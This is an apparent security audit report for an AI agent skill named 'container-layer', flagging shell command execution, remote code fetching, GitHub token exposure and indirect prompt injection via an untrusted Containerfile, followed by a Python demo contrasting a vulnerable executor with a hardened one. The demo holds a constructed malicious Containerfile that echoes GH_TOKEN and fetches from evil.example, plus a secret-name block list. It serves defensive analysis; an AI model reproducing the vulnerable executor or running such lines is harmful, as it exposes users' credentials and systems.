container-layer
Fail
Audited by Gen Agent Trust Hub on May 3, 2026
Risk Level: HIGH
COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill executes arbitrary shell commands defined in the Containerfile via the RUN instruction. The implementation in scripts/containerfile.py uses subprocess.run with shell=True, giving those commands full shell access to the container environment.
- [REMOTE_CODE_EXECUTION]: The FETCH instruction in scripts/containerfile.py downloads and extracts remote content into the environment. Additionally, the bootstrap scripts (boot.sh and boot-ccotw.sh) execute code downloaded from a remote repository at runtime; this is an inherent risk of the skill's bootstrap mechanism.
- [DATA_EXFILTRATION]: The skill processes sensitive environment variables and a GitHub token (GH_TOKEN). A malicious Containerfile could read and exfiltrate these secrets using the arbitrary command execution described above.
- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it processes untrusted Containerfile content as instructions.
  - Ingestion points: The skill reads a Containerfile from the local project directory (e.g., /mnt/project/Containerfile).
  - Boundary markers: None; nothing distinguishes trusted from untrusted instructions.
  - Capability inventory: Full shell execution (RUN), remote file downloads (FETCH), and access to environment secrets.
  - Sanitization: No validation, escaping, or filtering is performed on the instructions before execution.
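The findings above describe a pattern rather than show it. The following is an added illustration, not the skill's scripts/containerfile.py: a minimal Containerfile executor written the way the audit describes (RUN handed to subprocess.run with shell=True under the caller's full environment, FETCH accepted unchecked), beside a hardened variant that audits the instructions first, fails closed on any finding, and scrubs secrets such as GH_TOKEN from the environment before a RUN gets a shell. The Containerfiles, the DEMO_ENV dictionary, the SECRET_NAMES list and the FETCH_ALLOWLIST are all constructed for the example; fetches are recorded rather than performed so it runs offline.

```python
"""Naive Containerfile executor (the pattern the audit flags) beside a hardened one.
Constructed illustration; not the skill's own scripts/containerfile.py."""
import re
import subprocess
from urllib.parse import urlparse

# Assumptions for the demo: which environment variables count as secrets and
# which hosts a FETCH may pull from. A real policy would come from the project.
SECRET_NAMES = ("GH_TOKEN", "GITHUB_TOKEN", "AWS_SECRET_ACCESS_KEY")
FETCH_ALLOWLIST = ("github.com", "objects.githubusercontent.com")
KNOWN_INSTRUCTIONS = ("FROM", "RUN", "FETCH")

# Constructed environment handed to the executor (minimal PATH so echo/env resolve).
DEMO_ENV = {"PATH": "/usr/bin:/bin", "GH_TOKEN": "ghp_constructed_token_000"}

# Constructed Containerfile an attacker could drop into the project directory:
# the RUN reads the token, the FETCH points at an unexpected host.
MALICIOUS_CONTAINERFILE = """\
FROM scratch
RUN echo "token=$GH_TOKEN"
FETCH https://evil.example/payload.tar.gz /tmp/payload.tar.gz
"""

# Constructed benign Containerfile that passes the audit.
BENIGN_CONTAINERFILE = """\
FROM scratch
# comments and blank lines are ignored

RUN echo hello
RUN env
FETCH https://github.com/example/tool/releases/download/v1/tool.tar.gz /tmp/tool.tar.gz
"""


def parse(text):
    """Return [(lineno, INSTRUCTION, args)] for non-blank, non-comment lines."""
    instructions = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        instr, _, args = line.partition(" ")
        instructions.append((lineno, instr.upper(), args.strip()))
    return instructions


def run_naive(instructions, env):
    """Vulnerable pattern: each RUN goes to subprocess.run(shell=True) with the caller's
    full environment, and every FETCH is accepted unchecked. Returns (run_outputs,
    fetch_urls); fetches are recorded, not performed, so the demo stays offline."""
    run_outputs, fetch_urls = [], []
    for _, instr, args in instructions:
        if instr == "RUN":
            proc = subprocess.run(args, shell=True, capture_output=True, text=True, env=env)
            run_outputs.append(proc.stdout.strip())
        elif instr == "FETCH":
            fetch_urls.append(args.split()[0])
    return run_outputs, fetch_urls


def audit(instructions):
    """Pre-execution policy check: unknown instructions, RUN lines referencing a secret
    variable (heuristic: $NAME or ${NAME}), and FETCH sources off the https allowlist."""
    findings = []
    for lineno, instr, args in instructions:
        if instr not in KNOWN_INSTRUCTIONS:
            findings.append(f"line {lineno}: unknown instruction {instr}")
        elif instr == "RUN":
            for name in SECRET_NAMES:
                if re.search(r"\$\{?" + re.escape(name) + r"\b", args):
                    findings.append(f"line {lineno}: RUN references secret {name}")
        elif instr == "FETCH":
            url = args.split()[0] if args else ""
            parsed = urlparse(url)
            if parsed.scheme != "https" or parsed.hostname not in FETCH_ALLOWLIST:
                findings.append(f"line {lineno}: FETCH source not allowlisted: {url}")
    return findings


def scrub_env(env):
    """Drop known secrets so a RUN shell cannot read them from its environment."""
    return {k: v for k, v in env.items() if k not in SECRET_NAMES}


def run_hardened(instructions, env):
    """Audit first and fail closed: nothing executes if there is any finding. Otherwise
    RUN still gets a shell (that is what the instruction means) but with secrets scrubbed.
    Returns (findings, run_outputs, fetch_urls)."""
    findings = audit(instructions)
    if findings:
        return findings, [], []
    run_outputs, fetch_urls = run_naive(instructions, scrub_env(env))
    return findings, run_outputs, fetch_urls


if __name__ == "__main__":
    print("naive:", run_naive(parse(MALICIOUS_CONTAINERFILE), DEMO_ENV))
    print("hardened:", run_hardened(parse(MALICIOUS_CONTAINERFILE), DEMO_ENV))
    print("hardened, benign file:", run_hardened(parse(BENIGN_CONTAINERFILE), DEMO_ENV))
```

Scrubbing the environment only closes one channel: a RUN shell can still read credential files on disk, so the trust decision about where the Containerfile came from (the missing boundary marker noted above) is the real control, and the audit step is what lets the executor refuse untrusted input instead of running it.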
Recommendations
- AI detected serious security threats
Audit Metadata